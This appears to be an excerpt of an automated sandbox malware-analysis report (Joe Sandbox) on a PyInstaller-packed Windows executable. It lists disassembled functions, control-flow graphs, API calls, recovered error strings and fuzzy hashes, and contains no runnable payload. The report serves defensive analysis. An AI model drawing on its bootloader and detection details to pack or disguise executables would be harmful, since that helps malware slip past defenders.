                                                  • GetLastError.KERNEL32(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA488CD
                                                  • GetTokenInformation.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA4890A
                                                  • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79EA4891C
                                                  • FindCloseChangeNotification.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA48934
                                                  • LocalFree.KERNEL32(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA48966
                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF79EA4898D
                                                  • CreateDirectoryW.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA4899E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Token$ConvertDescriptorInformationProcessSecurityString$ChangeCloseCreateCurrentDirectoryErrorFindFreeLastLocalNotificationOpen
                                                  • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                  • API String ID: 2187719417-2855260032
                                                  • Opcode ID: d78f49ae4b380411a75aa6cbb447eda7484dc81e76002bff55da3e5cee019735
                                                  • Instruction ID: afe01fa4ae117a4522db3966b5b7bd48ad67de0ab2af18032845b44b6bbc953c
                                                  • Opcode Fuzzy Hash: d78f49ae4b380411a75aa6cbb447eda7484dc81e76002bff55da3e5cee019735
                                                  • Instruction Fuzzy Hash: 0241863161CA8296EB60AF71F484ABAA360FF857A4F844231FA5E476A5DF3CD444C770
                                                  Function 00007FF79EA41AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _fread_nolock$Message
                                                  • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                  • API String ID: 677216364-1384898525
                                                  • Opcode ID: 9a8dc730619d31249d4015af2233e25f710a46ce78a2e0685fa874a19269a1b3
                                                  • Instruction ID: 855ca5f9b9d808a4f8022a37c09d0e7fcb28d44e07af34c432bdf1ca628f1131
                                                  • Opcode Fuzzy Hash: 9a8dc730619d31249d4015af2233e25f710a46ce78a2e0685fa874a19269a1b3
                                                  • Instruction Fuzzy Hash: 5F516D72A09A4286EB34EF38D480979B7A0EF99B84B958135D90C877B5EE7CE440C774
                                                  Function 00007FF79EA47F80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                  • String ID: CreateProcessW$Error creating child process!
                                                  • API String ID: 2895956056-3524285272
                                                  • Opcode ID: d825b08e7f8213722baccb384613801bfeab442e381f962a1bcb54389bddb714
                                                  • Instruction ID: 4bafa1708d03494297710f46d231288fe9535f64fb372bdb7e0868060b8a2040
                                                  • Opcode Fuzzy Hash: d825b08e7f8213722baccb384613801bfeab442e381f962a1bcb54389bddb714
                                                  • Instruction Fuzzy Hash: 54413031A08B8285DA30AB34E4956BEF365FBD5764F800735E6AD43AE5DF7CD0448B20
                                                  Function 00007FF79EA62494 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 319 7ff79ea62494-7ff79ea62507 call 7ff79ea621c4 322 7ff79ea62509-7ff79ea62512 call 7ff79ea5135c 319->322 323 7ff79ea62521-7ff79ea6252b call 7ff79ea5404c 319->323 330 7ff79ea62515-7ff79ea6251c call 7ff79ea5137c 322->330 328 7ff79ea6252d-7ff79ea62544 call 7ff79ea5135c call 7ff79ea5137c 323->328 329 7ff79ea62546-7ff79ea625af CreateFileW 323->329 328->330 333 7ff79ea6262c-7ff79ea62637 GetFileType 329->333 334 7ff79ea625b1-7ff79ea625b7 329->334 341 7ff79ea6285a-7ff79ea6287a 330->341 336 7ff79ea6268a-7ff79ea62691 333->336 337 7ff79ea62639-7ff79ea62674 GetLastError call 7ff79ea5130c CloseHandle 333->337 339 7ff79ea625f9-7ff79ea62627 GetLastError call 7ff79ea5130c 334->339 340 7ff79ea625b9-7ff79ea625bd 334->340 344 7ff79ea62699-7ff79ea6269c 336->344 345 7ff79ea62693-7ff79ea62697 336->345 337->330 353 7ff79ea6267a-7ff79ea62685 call 7ff79ea5137c 337->353 339->330 340->339 346 7ff79ea625bf-7ff79ea625f7 CreateFileW 340->346 351 7ff79ea626a2-7ff79ea626f3 call 7ff79ea53f64 344->351 352 7ff79ea6269e 344->352 345->351 346->333 346->339 358 7ff79ea626f5-7ff79ea62701 call 7ff79ea623d0 351->358 359 7ff79ea62712-7ff79ea62742 call 7ff79ea61f30 351->359 352->351 353->330 358->359 364 7ff79ea62703 358->364 365 7ff79ea62744-7ff79ea62787 359->365 366 7ff79ea62705-7ff79ea6270d call 7ff79ea56988 359->366 364->366 368 7ff79ea627a9-7ff79ea627b4 365->368 369 7ff79ea62789-7ff79ea6278d 365->369 366->341 372 7ff79ea62858 368->372 373 7ff79ea627ba-7ff79ea627be 368->373 369->368 371 7ff79ea6278f-7ff79ea627a4 369->371 371->368 372->341 373->372 374 7ff79ea627c4-7ff79ea62809 CloseHandle CreateFileW 373->374 375 7ff79ea6280b-7ff79ea62839 GetLastError call 7ff79ea5130c call 7ff79ea5418c 374->375 376 7ff79ea6283e-7ff79ea62853 374->376 375->376 376->372
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                  • String ID:
                                                  • API String ID: 1330151763-0
                                                  • Opcode ID: 82e8923be977671dc85c0f7899ee02d888d5c39806c92afe536ffb1660ddf0a1
                                                  • Instruction ID: 8ddb0447a964789afe4150fe224b385eb3c1a40bbe445b744a62a1c515453d39
                                                  • Opcode Fuzzy Hash: 82e8923be977671dc85c0f7899ee02d888d5c39806c92afe536ffb1660ddf0a1
                                                  • Instruction Fuzzy Hash: C0C1B036B24E4289EB60DF74C490ABC7760EB59BA8B514239DA1E477E4DF38D451C330
                                                  Function 00007FF79EA41000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 265COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 381 7ff79ea41000-7ff79ea439a6 call 7ff79ea4de20 call 7ff79ea4de18 call 7ff79ea485b0 call 7ff79ea4de18 call 7ff79ea4bb90 call 7ff79ea51230 call 7ff79ea51dd4 call 7ff79ea41eb0 399 7ff79ea439ac-7ff79ea439bc call 7ff79ea43e90 381->399 400 7ff79ea43aa2 381->400 399->400 406 7ff79ea439c2-7ff79ea439d5 call 7ff79ea43d60 399->406 402 7ff79ea43aa7-7ff79ea43ac7 call 7ff79ea4bbf0 400->402 406->400 409 7ff79ea439db-7ff79ea43a02 call 7ff79ea47a60 406->409 412 7ff79ea43a44-7ff79ea43a6c call 7ff79ea47f40 call 7ff79ea41cb0 409->412 413 7ff79ea43a04-7ff79ea43a13 call 7ff79ea47a60 409->413 424 7ff79ea43a72-7ff79ea43a88 call 7ff79ea41cb0 412->424 425 7ff79ea43b41-7ff79ea43b52 412->425 413->412 419 7ff79ea43a15-7ff79ea43a1b 413->419 421 7ff79ea43a27-7ff79ea43a41 call 7ff79ea50f4c call 7ff79ea47f40 419->421 422 7ff79ea43a1d-7ff79ea43a25 419->422 421->412 422->421 440 7ff79ea43a8a-7ff79ea43a9d call 7ff79ea42b30 424->440 441 7ff79ea43ac8-7ff79ea43acb 424->441 427 7ff79ea43b6e-7ff79ea43b71 425->427 428 7ff79ea43b54-7ff79ea43b5b 425->428 432 7ff79ea43b87-7ff79ea43b9f call 7ff79ea489e0 427->432 433 7ff79ea43b73-7ff79ea43b79 427->433 428->427 431 7ff79ea43b5d-7ff79ea43b60 call 7ff79ea414f0 428->431 444 7ff79ea43b65-7ff79ea43b68 431->444 449 7ff79ea43bb2-7ff79ea43bb9 SetDllDirectoryW 432->449 450 7ff79ea43ba1-7ff79ea43bad call 7ff79ea42b30 432->450 437 7ff79ea43b7b-7ff79ea43b85 433->437 438 7ff79ea43bbf-7ff79ea43bcc call 7ff79ea46ce0 433->438 437->432 437->438 451 7ff79ea43c17-7ff79ea43c1c call 7ff79ea46c60 438->451 452 7ff79ea43bce-7ff79ea43bdb call 7ff79ea46990 438->452 440->400 441->425 443 7ff79ea43acd-7ff79ea43ae4 call 7ff79ea43fa0 441->443 457 7ff79ea43aeb-7ff79ea43b17 call 7ff79ea481b0 443->457 458 7ff79ea43ae6-7ff79ea43ae9 443->458 444->400 444->427 449->438 450->400 460 7ff79ea43c21-7ff79ea43c24 451->460 452->451 466 7ff79ea43bdd-7ff79ea43bec call 7ff79ea464e0 452->466 457->425 472 7ff79ea43b19-7ff79ea43b21 call 7ff79ea4deac 457->472 462 7ff79ea43b26-7ff79ea43b3c call 7ff79ea42b30 458->462 464 7ff79ea43c2a-7ff79ea43c37 460->464 465 7ff79ea43cd6-7ff79ea43ce5 call 7ff79ea434a0 460->465 462->400 469 7ff79ea43c40-7ff79ea43c4a 464->469 465->400 483 7ff79ea43ceb-7ff79ea43d3f call 7ff79ea47ed0 call 7ff79ea47a60 call 7ff79ea43600 call 7ff79ea47f80 call 7ff79ea46740 call 7ff79ea46c60 465->483 481 7ff79ea43bee-7ff79ea43bfa call 7ff79ea46460 466->481 482 7ff79ea43c0d-7ff79ea43c12 call 7ff79ea46740 466->482 474 7ff79ea43c4c-7ff79ea43c51 469->474 475 7ff79ea43c53-7ff79ea43c55 469->475 472->462 474->469 474->475 479 7ff79ea43c57-7ff79ea43c7a call 7ff79ea41ef0 475->479 480 7ff79ea43ca1-7ff79ea43cd1 call 7ff79ea43600 call 7ff79ea43440 call 7ff79ea435f0 call 7ff79ea46740 call 7ff79ea46c60 475->480 479->400 494 7ff79ea43c80-7ff79ea43c8b 479->494 480->402 481->482 495 7ff79ea43bfc-7ff79ea43c0b call 7ff79ea46b30 481->495 482->451 517 7ff79ea43d4d-7ff79ea43d50 call 7ff79ea41e80 483->517 518 7ff79ea43d41-7ff79ea43d48 call 7ff79ea47c40 483->518 499 7ff79ea43c90-7ff79ea43c9f 494->499 495->460 499->480 499->499 521 7ff79ea43d55-7ff79ea43d57 517->521 518->517 521->402
                                                  APIs
                                                    • Part of subcall function 00007FF79EA43E90: GetModuleFileNameW.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA43EC1
                                                  • SetDllDirectoryW.KERNEL32 ref: 00007FF79EA43BB9
                                                    • Part of subcall function 00007FF79EA47A60: GetEnvironmentVariableW.KERNEL32(00007FF79EA439EF), ref: 00007FF79EA47A9A
                                                    • Part of subcall function 00007FF79EA47A60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79EA47AB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                  • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                  • API String ID: 2344891160-3602715111
                                                  • Opcode ID: 2969d0634b6313d4c6d91898a8dfdbe2d1d87c3fa11ef7abcc160afb7d176cef
                                                  • Instruction ID: 595b4d7a306f3047859b97e8deedfa621d74f07f5c65e5106c1185f4eb33f6d2
                                                  • Opcode Fuzzy Hash: 2969d0634b6313d4c6d91898a8dfdbe2d1d87c3fa11ef7abcc160afb7d176cef
                                                  • Instruction Fuzzy Hash: 4DB16D21A1CA8255EA34BB3199D1ABDD291FF94B84FC44131EA4D476B7FF2CE9098730
                                                  Function 00007FF79EA41050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 522 7ff79ea41050-7ff79ea410ab call 7ff79ea4b3f0 525 7ff79ea410ad-7ff79ea410d2 call 7ff79ea42b30 522->525 526 7ff79ea410d3-7ff79ea410eb call 7ff79ea50f60 522->526 531 7ff79ea41109-7ff79ea41119 call 7ff79ea50f60 526->531 532 7ff79ea410ed-7ff79ea41104 call 7ff79ea42890 526->532 538 7ff79ea41137-7ff79ea41147 531->538 539 7ff79ea4111b-7ff79ea41132 call 7ff79ea42890 531->539 537 7ff79ea4126c-7ff79ea41281 call 7ff79ea4b0c0 call 7ff79ea50f4c * 2 532->537 555 7ff79ea41286-7ff79ea412a0 537->555 541 7ff79ea41150-7ff79ea41175 call 7ff79ea4e1c8 538->541 539->537 549 7ff79ea4125e 541->549 550 7ff79ea4117b-7ff79ea41185 call 7ff79ea4df3c 541->550 553 7ff79ea41264 549->553 550->549 556 7ff79ea4118b-7ff79ea41197 550->556 553->537 557 7ff79ea411a0-7ff79ea411c8 call 7ff79ea49870 556->557 560 7ff79ea411ca-7ff79ea411cd 557->560 561 7ff79ea41241-7ff79ea4125c call 7ff79ea42b30 557->561 562 7ff79ea4123c 560->562 563 7ff79ea411cf-7ff79ea411d9 560->563 561->553 562->561 565 7ff79ea411db-7ff79ea411e8 call 7ff79ea4e6f0 563->565 566 7ff79ea41203-7ff79ea41206 563->566 573 7ff79ea411ed-7ff79ea411f0 565->573 568 7ff79ea41219-7ff79ea4121e 566->568 569 7ff79ea41208-7ff79ea41216 call 7ff79ea4c960 566->569 568->557 572 7ff79ea41220-7ff79ea41223 568->572 569->568 575 7ff79ea41237-7ff79ea4123a 572->575 576 7ff79ea41225-7ff79ea41228 572->576 577 7ff79ea411fe-7ff79ea41201 573->577 578 7ff79ea411f2-7ff79ea411fc call 7ff79ea4df3c 573->578 575->553 576->561 579 7ff79ea4122a-7ff79ea41232 576->579 577->561 578->568 578->577 579->541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                  • API String ID: 2030045667-1655038675
                                                  • Opcode ID: 3bbf6c18c64704fa27b000cda3f66458baf70d53aa8143dd7fbdc75dc1ea0fd3
                                                  • Instruction ID: 79bfe2abcdb0e317419bd2f1c58e4eae0ed1ad601f8a416e2668fcaff97126b2
                                                  • Opcode Fuzzy Hash: 3bbf6c18c64704fa27b000cda3f66458baf70d53aa8143dd7fbdc75dc1ea0fd3
                                                  • Instruction Fuzzy Hash: ED51B262A0CA8285EA70BB75A4C0BBAA290FBA5794FC44135DD4D877A5FF3CE505C730
                                                  Function 00007FF79EA5726C Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 7ff79ea5726c-7ff79ea57292 654 7ff79ea572ad-7ff79ea572b1 653->654 655 7ff79ea57294-7ff79ea572a8 call 7ff79ea5135c call 7ff79ea5137c 653->655 656 7ff79ea572b7-7ff79ea572be 654->656 657 7ff79ea57690-7ff79ea5769c call 7ff79ea5135c call 7ff79ea5137c 654->657 669 7ff79ea576a7 655->669 656->657 659 7ff79ea572c4-7ff79ea572f6 656->659 676 7ff79ea576a2 call 7ff79ea567c8 657->676 659->657 663 7ff79ea572fc-7ff79ea57303 659->663 666 7ff79ea5731c-7ff79ea5731f 663->666 667 7ff79ea57305-7ff79ea57317 call 7ff79ea5135c call 7ff79ea5137c 663->667 672 7ff79ea5768c-7ff79ea5768e 666->672 673 7ff79ea57325-7ff79ea57327 666->673 667->676 674 7ff79ea576aa-7ff79ea576c1 669->674 672->674 673->672 677 7ff79ea5732d-7ff79ea57330 673->677 676->669 677->667 680 7ff79ea57332-7ff79ea57358 677->680 682 7ff79ea57397-7ff79ea5739f 680->682 683 7ff79ea5735a-7ff79ea5735d 680->683 686 7ff79ea57369-7ff79ea57380 call 7ff79ea5135c call 7ff79ea5137c call 7ff79ea567c8 682->686 687 7ff79ea573a1-7ff79ea573c9 call 7ff79ea58c00 call 7ff79ea56830 * 2 682->687 684 7ff79ea57385-7ff79ea57392 683->684 685 7ff79ea5735f-7ff79ea57367 683->685 689 7ff79ea5741b-7ff79ea5742e 684->689 685->684 685->686 717 7ff79ea57520 686->717 713 7ff79ea573cb-7ff79ea573e1 call 7ff79ea5137c call 7ff79ea5135c 687->713 714 7ff79ea573e6-7ff79ea57417 call 7ff79ea579c4 687->714 692 7ff79ea574aa-7ff79ea574b4 call 7ff79ea5f2b8 689->692 693 7ff79ea57430-7ff79ea57438 689->693 704 7ff79ea5753e 692->704 705 7ff79ea574ba-7ff79ea574cf 692->705 693->692 697 7ff79ea5743a-7ff79ea5743c 693->697 697->692 701 7ff79ea5743e-7ff79ea57455 697->701 701->692 706 7ff79ea57457-7ff79ea57463 701->706 709 7ff79ea57543-7ff79ea57563 ReadFile 704->709 705->704 711 7ff79ea574d1-7ff79ea574e3 GetConsoleMode 705->711 706->692 712 7ff79ea57465-7ff79ea57467 706->712 715 7ff79ea57569-7ff79ea57571 709->715 716 7ff79ea57656-7ff79ea5765f GetLastError 709->716 711->704 718 7ff79ea574e5-7ff79ea574ed 711->718 712->692 719 7ff79ea57469-7ff79ea57481 712->719 713->717 714->689 715->716 722 7ff79ea57577 715->722 725 7ff79ea5767c-7ff79ea5767f 716->725 726 7ff79ea57661-7ff79ea57677 call 7ff79ea5137c call 7ff79ea5135c 716->726 727 7ff79ea57523-7ff79ea5752d call 7ff79ea56830 717->727 718->709 724 7ff79ea574ef-7ff79ea57511 ReadConsoleW 718->724 719->692 720 7ff79ea57483-7ff79ea5748f 719->720 720->692 728 7ff79ea57491-7ff79ea57493 720->728 732 7ff79ea5757e-7ff79ea57593 722->732 734 7ff79ea57513 GetLastError 724->734 735 7ff79ea57532-7ff79ea5753c 724->735 729 7ff79ea57519-7ff79ea5751b call 7ff79ea5130c 725->729 730 7ff79ea57685-7ff79ea57687 725->730 726->717 727->674 728->692 739 7ff79ea57495-7ff79ea574a5 728->739 729->717 730->727 732->727 741 7ff79ea57595-7ff79ea575a0 732->741 734->729 735->732 739->692 745 7ff79ea575c7-7ff79ea575cf 741->745 746 7ff79ea575a2-7ff79ea575bb call 7ff79ea56e30 741->746 750 7ff79ea57644-7ff79ea57651 call 7ff79ea56be8 745->750 751 7ff79ea575d1-7ff79ea575e3 745->751 753 7ff79ea575c0-7ff79ea575c2 746->753 750->753 754 7ff79ea57637-7ff79ea5763f 751->754 755 7ff79ea575e5 751->755 753->727 754->727 757 7ff79ea575ea-7ff79ea575f1 755->757 758 7ff79ea5762d-7ff79ea57631 757->758 759 7ff79ea575f3-7ff79ea575f7 757->759 758->754 760 7ff79ea575f9-7ff79ea57600 759->760 761 7ff79ea57613 759->761 760->761 762 7ff79ea57602-7ff79ea57606 760->762 763 7ff79ea57619-7ff79ea57629 761->763 762->761 764 7ff79ea57608-7ff79ea57611 762->764 763->757 765 7ff79ea5762b 763->765 764->763 765->754
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 2ec5569ab8a1941f337aa7754c41b084211f8f693c721f6c053ec5d2037e5917
                                                  • Instruction ID: e473307a4ce31289bbb02661455efc58e014fa1f79a954deba553f59062b9e9b
                                                  • Opcode Fuzzy Hash: 2ec5569ab8a1941f337aa7754c41b084211f8f693c721f6c053ec5d2037e5917
                                                  • Instruction Fuzzy Hash: 62C1E462A0CA8685E670AB359484A7DFBA1EB90B90FD50131EA4E137B1DF7CEC55C330
                                                  Function 00007FF79EA585B8 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 843 7ff79ea585b8-7ff79ea585dd 844 7ff79ea585e3-7ff79ea585e6 843->844 845 7ff79ea58881 843->845 846 7ff79ea585e8-7ff79ea58602 call 7ff79ea5135c call 7ff79ea5137c call 7ff79ea567c8 844->846 847 7ff79ea58607-7ff79ea5862e 844->847 848 7ff79ea58883-7ff79ea5889a 845->848 846->848 849 7ff79ea58639-7ff79ea5863f 847->849 850 7ff79ea58630-7ff79ea58637 847->850 852 7ff79ea5864f-7ff79ea5865d call 7ff79ea5f2b8 849->852 853 7ff79ea58641-7ff79ea5864a call 7ff79ea579c4 849->853 850->846 850->849 860 7ff79ea5876e-7ff79ea5877e 852->860 861 7ff79ea58663-7ff79ea58673 852->861 853->852 863 7ff79ea587cd-7ff79ea587f2 WriteFile 860->863 864 7ff79ea58780-7ff79ea58785 860->864 861->860 865 7ff79ea58679-7ff79ea5868c call 7ff79ea59630 861->865 870 7ff79ea587fd 863->870 871 7ff79ea587f4-7ff79ea587fa GetLastError 863->871 867 7ff79ea58787-7ff79ea5878a 864->867 868 7ff79ea587b9-7ff79ea587cb call 7ff79ea5813c 864->868 882 7ff79ea5868e-7ff79ea5869e 865->882 883 7ff79ea586a4-7ff79ea586c0 GetConsoleMode 865->883 872 7ff79ea5878c-7ff79ea5878f 867->872 873 7ff79ea587a5-7ff79ea587b7 call 7ff79ea5835c 867->873 888 7ff79ea58762-7ff79ea58769 868->888 876 7ff79ea58800 870->876 871->870 878 7ff79ea5880a-7ff79ea58814 872->878 879 7ff79ea58791-7ff79ea587a3 call 7ff79ea58240 872->879 873->888 877 7ff79ea58805 876->877 877->878 884 7ff79ea5887a-7ff79ea5887f 878->884 885 7ff79ea58816-7ff79ea5881b 878->885 879->888 882->860 882->883 883->860 889 7ff79ea586c6-7ff79ea586c9 883->889 884->848 890 7ff79ea5881d-7ff79ea58820 885->890 891 7ff79ea5884a-7ff79ea5885b 885->891 888->877 893 7ff79ea58750-7ff79ea5875d call 7ff79ea57c50 889->893 894 7ff79ea586cf-7ff79ea586d6 889->894 895 7ff79ea5883d-7ff79ea58845 call 7ff79ea5130c 890->895 896 7ff79ea58822-7ff79ea58832 call 7ff79ea5137c call 7ff79ea5135c 890->896 898 7ff79ea5885d-7ff79ea58860 891->898 899 7ff79ea58862-7ff79ea58872 call 7ff79ea5137c call 7ff79ea5135c 891->899 893->888 894->878 900 7ff79ea586dc-7ff79ea586ea 894->900 895->891 896->895 898->845 898->899 899->884 900->876 901 7ff79ea586f0 900->901 905 7ff79ea586f3-7ff79ea5870a call 7ff79ea5f384 901->905 915 7ff79ea5870c-7ff79ea58716 905->915 916 7ff79ea58742-7ff79ea5874b GetLastError 905->916 917 7ff79ea58718-7ff79ea5872a call 7ff79ea5f384 915->917 918 7ff79ea58733-7ff79ea5873a 915->918 916->876 917->916 922 7ff79ea5872c-7ff79ea58731 917->922 918->876 920 7ff79ea58740 918->920 920->905 922->918
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA585FA
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577,?,?,?,00007FF79EA5334F), ref: 00007FF79EA586B8
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577,?,?,?,00007FF79EA5334F), ref: 00007FF79EA58742
                                                  Memory Dump Source
